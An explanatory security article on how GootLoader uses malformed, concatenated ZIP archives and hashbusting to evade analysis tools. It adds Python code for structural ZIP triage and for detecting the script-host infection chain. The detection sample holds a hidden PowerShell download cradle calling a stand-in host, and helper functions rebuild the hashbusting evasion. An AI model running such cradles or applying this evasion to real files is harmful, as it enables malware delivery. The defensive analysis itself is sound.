The name GootLoader has been attached to some of the most persistent malware incidents for years: it is not ransomware in itself but a loader, a component that specializes in opening the door for more dangerous payloads. Recent investigations show that its operators have refined their tricks to slip past routine automated detection and analysis tools. Instead of relying on code obfuscation alone, they exploit peculiarities of the ZIP format and of the Windows ecosystem so that the end victim can still execute the malicious payload while defensive tooling is left confused.
The most striking technique, reported by the security firm Expel, is the creation of intentionally "malformed" ZIP files. Rather than a standard archive, the attackers concatenate hundreds of sub-archives (between 500 and 1,000) and manipulate central directory fields and other metadata so that common extractors such as 7-Zip or WinRAR fail with errors. Curiously, the extractor built into Windows usually opens these files without complaint. The result is perverse: most automated analysis tools cannot process the ZIP, while an unsuspecting user who double-clicks it on a Windows machine gets to its contents and runs the malware.

To understand why the trick works, two technical aspects matter. First, the attackers truncate or alter the ZIP's End of Central Directory (EOCD) record, the trailer that tells an extractor where the archive ends, where the central directory lives and how the archive is structured (the Wikipedia article on the ZIP format describes the record in detail). Second, they manipulate non-critical fields such as the disk numbers and introduce random variation into the metadata. These variations make hash-based signatures useless: every download produces a unique copy of the ZIP, a technique researchers call "hashbusting".
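The following Python script is an added example, not Expel's tooling and not GootLoader code, showing what a structure-aware triage of such an archive looks like: it walks every PK record in the file instead of trusting the zipfile module, flags concatenation (several EOCD records), tampered disk-number fields and a central directory that no longer lines up with its EOCD, and fingerprints each entry's decompressed content so that hashbusting the trailer does not change the result. The two archives it examines are constructed in memory and only mimic the shape described above; the names agreement.js and decoy0.txt and the script bytes are placeholders.

```python
"""Added example, not Expel's tooling or GootLoader code: structural ZIP triage.
Walks every PK record rather than trusting zipfile's happy path, reports the
anomalies the article describes, and hashes entry contents (not metadata) so
that hashbusted copies of one payload share a fingerprint. Samples are
constructed in memory and mimic only the shape of the reported archives."""
import hashlib
import io
import os
import struct
import zipfile
import zlib

LFH_SIG, CDH_SIG, EOCD_SIG = b"PK\x03\x04", b"PK\x01\x02", b"PK\x05\x06"
LFH_FMT = "<4s5H3I2H"    # 30 B: sig, ver, flags, method, time, date, crc, csize, usize, nlen, elen
CDH_FMT = "<4s6H3I5H2I"  # 46 B: ..., crc, csize, usize, nlen, elen, clen, disk, iattr, eattr, lfh_off
EOCD_FMT = "<4s4H2IH"    # 22 B: sig, disk, cd_disk, n_disk, n_total, cd_size, cd_off, clen


def make_zip(files):
    """Well-formed archive built with the standard library (constructed sample data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in files.items():
            zf.writestr(name, data)
    return buf.getvalue()


def hashbust(blob):
    """Mimic the reported metadata tampering: random disk-number fields plus a
    random archive comment. The entries themselves are left untouched."""
    at = blob.rfind(EOCD_SIG)
    f = list(struct.unpack_from(EOCD_FMT, blob, at))
    f[1] = f[2] = int.from_bytes(os.urandom(2), "little")   # disk / cd_disk
    comment = os.urandom(1 + os.urandom(1)[0] % 64)
    f[7] = len(comment)
    return blob[:at] + struct.pack(EOCD_FMT, *f) + comment


def make_gootloader_style(payload_name, payload, decoys=3):
    """Concatenate decoy sub-archives ahead of the one carrying the script
    (the article reports 500-1,000; three are enough to show the structure)."""
    parts = [hashbust(make_zip({"decoy%d.txt" % i: b"filler %d" % i})) for i in range(decoys)]
    parts.append(hashbust(make_zip({payload_name: payload})))
    return b"".join(parts)


def walk(blob):
    """Walk every PK record; return (entries, eocd_records, anomalies).
    entries are (name, method, crc, compressed_bytes) taken from local file headers."""
    entries, eocds, anomalies = [], [], []
    pos, n = 0, len(blob)
    while pos < n:
        sig = blob[pos:pos + 4]
        if sig == LFH_SIG and n - pos >= 30:
            f = struct.unpack_from(LFH_FMT, blob, pos)
            name_at, data_at = pos + 30, pos + 30 + f[9] + f[10]
            entries.append((blob[name_at:name_at + f[9]].decode("cp437"), f[3], f[6],
                            blob[data_at:data_at + f[7]]))
            pos = data_at + f[7]
        elif sig == CDH_SIG and n - pos >= 46:
            f = struct.unpack_from(CDH_FMT, blob, pos)
            pos += 46 + f[10] + f[11] + f[12]
        elif sig == EOCD_SIG and n - pos >= 22:
            f = struct.unpack_from(EOCD_FMT, blob, pos)
            eocds.append((pos, f))
            pos += 22 + f[7]
        else:  # stray bytes: resync on the next signature, or stop at end of file
            nxt = [i for i in (blob.find(s, pos + 1) for s in (LFH_SIG, CDH_SIG, EOCD_SIG)) if i != -1]
            nxt = min(nxt) if nxt else n
            anomalies.append("%d stray bytes at offset %d" % (nxt - pos, pos))
            pos = nxt
    if len(eocds) != 1:
        anomalies.append("%d EOCD records (concatenated or truncated archive)" % len(eocds))
    if eocds:
        at, f = eocds[-1]  # the trailer an extractor searching backwards will use
        if f[1] or f[2]:
            anomalies.append("multi-disk fields set: disk=%d cd_disk=%d" % (f[1], f[2]))
        if f[6] + f[5] != at:
            anomalies.append("central directory %d+%d does not end at EOCD offset %d" % (f[6], f[5], at))
        if f[4] != len(entries):
            anomalies.append("EOCD claims %d entries, %d local headers found" % (f[4], len(entries)))
    return entries, eocds, anomalies


def file_sha256(blob):
    """Whole-file hash: the value hashbusting is designed to defeat."""
    return hashlib.sha256(blob).hexdigest()


def entry_hashes(blob):
    """SHA-256 of each entry's decompressed content: stable across hashbusted copies."""
    out = {}
    for name, method, _crc, data in walk(blob)[0]:
        out[name] = hashlib.sha256(zlib.decompress(data, -15) if method == 8 else data).hexdigest()
    return out


if __name__ == "__main__":
    script = b"var sh = new ActiveXObject('WScript.Shell');"  # stand-in payload, constructed
    for label, blob in (("clean", make_zip({"agreement.js": script})),
                        ("gootloader-style", make_gootloader_style("agreement.js", script))):
        print(label, file_sha256(blob)[:16], walk(blob)[2] or "no anomalies")
        print("  agreement.js ->", entry_hashes(blob)["agreement.js"][:16])
```

Run it and the clean archive reports no anomalies, while the concatenated one reports four EOCD records, a central-directory offset that does not reach its EOCD and an entry count that disagrees with the local headers; two independently built copies of the concatenated archive differ as files but yield the same SHA-256 for agreement.js. The concatenation and offset checks are what separate these samples from ordinary archives, and the per-entry hash is what you pivot on once the file hash keeps changing.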
GootLoader's authors combine this approach with further layers of evasion. The ZIP may be delivered as an XOR-encoded blob that is decoded in the victim's browser and padded to a predetermined size, so that network security controls never see a ZIP cross the wire. Recent campaigns have also used custom WOFF2 fonts that change how file names render, disguising what the files are, and have abused the WordPress comment endpoint (/wp-comments-post.php) to return the file when the user presses a "Download" button on a compromised page.
The infection mechanics are simple and effective: the user searches for a legal template or document (classic SEO poisoning and malvertising) and lands on a compromised website offering a ZIP. Opened with the default Windows extractor, the archive appears as a compressed folder in File Explorer; if the user double-clicks a JavaScript file inside it, Windows stages the script in a temporary folder and runs it with wscript.exe, without the user ever explicitly extracting the archive to disk. From there the loader establishes persistence, for example by placing a shortcut (LNK) in the Startup folder, and launches a second script with cscript.exe that in turn invokes PowerShell commands to download and run additional payloads such as information stealers or ransomware.
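The chain described above maps onto three detection opportunities. The Python below is an added example, not Expel's or any vendor's detection content, that applies them to process-creation and file-creation events constructed inline in a Sysmon-like shape; the field names, sample paths, process IDs and the example.invalid URL are assumptions of this example. It also assumes that File Explorer stages a double-clicked archive member under %TEMP%\Temp1_<archive>\ before handing it to wscript.exe, which is where the first rule looks.

```python
"""Added example, not Expel's or any vendor's detection content: flag the
Explorer -> wscript.exe -> cscript.exe -> PowerShell chain plus Startup-folder
persistence from constructed, Sysmon-like events. Field names, paths and the
example.invalid URL are assumptions of this example."""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Assumption: Explorer's compressed-folder handler stages the clicked member here.
EXPLORER_ZIP_STAGING = re.compile(r"\\AppData\\Local\\Temp\\Temp1_[^\\]+\.zip\\", re.I)
DOWNLOAD_CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I)
STARTUP_LNK = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.I)

# Constructed sample: one infection chain (pids 200-400) and a benign logon script (pid 500).
PROCESS_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" "C:\Users\u\AppData\Local\Temp\Temp1_agreement_template.zip\agreement_template.js"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r"cscript.exe //nologo C:\Users\u\AppData\Roaming\stage2.js"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -w hidden -c IEX((New-Object Net.WebClient).DownloadString('http://example.invalid/x'))"},
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe \\fileserver\netlogon\mapdrives.vbs"},
]
FILE_EVENTS = [
    {"pid": 200, "path": r"C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\agreement.lnk"},
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(by_pid, pid, limit=16):
    """Image names from the process up to the root, child first (bounded against pid reuse loops)."""
    chain = []
    while pid in by_pid and len(chain) < limit:
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def detect(process_events, file_events=()):
    """Return (pid, reason) findings for the three stages of the chain."""
    by_pid = {e["pid"]: e for e in process_events}
    findings = []
    for e in process_events:
        img, parent = basename(e["image"]), by_pid.get(e["ppid"])
        # Stage 1: a script host spawned by Explorer on a file still inside the opened ZIP.
        if (img in SCRIPT_HOSTS and parent and basename(parent["image"]) == "explorer.exe"
                and EXPLORER_ZIP_STAGING.search(e["cmdline"])):
            findings.append((e["pid"], "script host run straight from an Explorer-opened ZIP"))
        # Stage 3: a PowerShell download cradle with a script host somewhere above it.
        if img == "powershell.exe" and DOWNLOAD_CRADLE.search(e["cmdline"]):
            chain = ancestry(by_pid, e["pid"])
            if SCRIPT_HOSTS & set(chain):
                findings.append((e["pid"], "download cradle under " + " <- ".join(chain)))
    # Stage 2: persistence via a shortcut written to the Startup folder by a script host.
    for f in file_events:
        creator = by_pid.get(f["pid"])
        if creator and basename(creator["image"]) in SCRIPT_HOSTS and STARTUP_LNK.search(f["path"]):
            findings.append((f["pid"], "Startup-folder LNK written by " + basename(creator["image"])))
    return findings


if __name__ == "__main__":
    for pid, reason in detect(PROCESS_EVENTS, FILE_EVENTS):
        print(pid, reason)
```

The benign wscript.exe launch from a network logon share produces no finding, which is the point of anchoring the first rule on the Temp1_ staging path rather than on the interpreter alone; the ancestry walk is what ties the PowerShell cradle back to the script host even when the intermediate cscript.exe process has already exited.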
This mode of operation underlines an old but still valid rule: modern threats combine social engineering with very specific technical detail. One quirk of the chain, the fact that the Windows extractor opens a ZIP that other tools cannot, is enough to let the sample slip past many automated analysis stages. Security teams therefore need to think both about how files are delivered and about what happens when a user interacts with them on the endpoint.
What practical measures reduce the risk? On the corporate side, the recommended controls limit automatic script execution: block or restrict wscript.exe and cscript.exe where they are not needed for legitimate operations, and change the handling of the .js extension so that such files open in a text editor instead of running. Microsoft documents the file-association settings and Group Policy options for managing how specific file types are opened (Microsoft documentation on default associations), and AppLocker or Windows Defender Application Control can block unauthorized use of the script interpreters (AppLocker guide). Note that remapping .js only changes what a double-click does; a script launched explicitly as "wscript.exe script.js" still runs, so the restriction on the interpreters themselves is the control that holds.

The delivery surface should not be neglected either: many of these campaigns depend on compromised WordPress sites or SEO-manipulated pages. Keeping the CMS and its plugins up to date, reviewing the entry points exposed by forms and comments, and monitoring for suspicious redirects and external resources all reduce the likelihood of a victim reaching the malicious ZIP. At the network level, controls that inspect unusual transfers or encoding patterns, together with endpoint protection that relies on behavior rather than signatures alone, can catch the malicious activity when a script tries to run commands or persist on the system.
The GootLoader story is also a lesson in why security cannot rest on hashes or static rules alone: unique, malformed files produced for every download make searching for a known hash ineffective. Detection must therefore incorporate dynamic analysis, origin reputation and endpoint controls that prevent the automatic execution of potentially dangerous content. Expel, which published the detailed analysis, offers more technical context on how these malformed ZIPs are built and why they trip up many unarchivers (Expel report).
In the end, defense is a mix of good digital hygiene, strict environment configuration and user training: teaching people to distrust downloads from unverified search results, to check the legitimacy of sites offering legal templates and, in corporate environments, enforcing policies that prevent the silent execution of scripts. Attackers will keep looking for technical and human cracks; the response must be both technical and human, combining network and endpoint protections with training and procedures that minimize the likelihood of a dangerous interaction.